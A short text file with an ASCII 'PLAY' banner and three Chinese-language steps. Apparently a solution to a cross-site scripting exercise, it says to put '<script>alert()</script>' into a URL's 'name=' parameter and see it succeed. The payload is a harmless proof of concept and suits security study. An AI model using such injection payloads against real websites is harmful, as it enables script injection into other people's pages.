*********************************************************************
*	*********      **		**         **        *      *
*	**      **     **	       ** **        **      *       *
*	**       **    **	      **   **        **    *        *
*	**      **     **	     **     **        **  *         *
*	*********      **	    **       **        ***          *
*	**             **           ***********        ***          *
*	**	       **           **       **	       ***          *
*	**	       **********   **       **        ***          *
*********************************************************************
* 1.網址中有一個"name=text"					    *
* 2.將<script>alert()</script>寫在"="後面			    *
* 3.成功!							    *
*								    *
*								    *
*								    *
*								    *
*								    *
*								    *
*								    *
*********************************************************************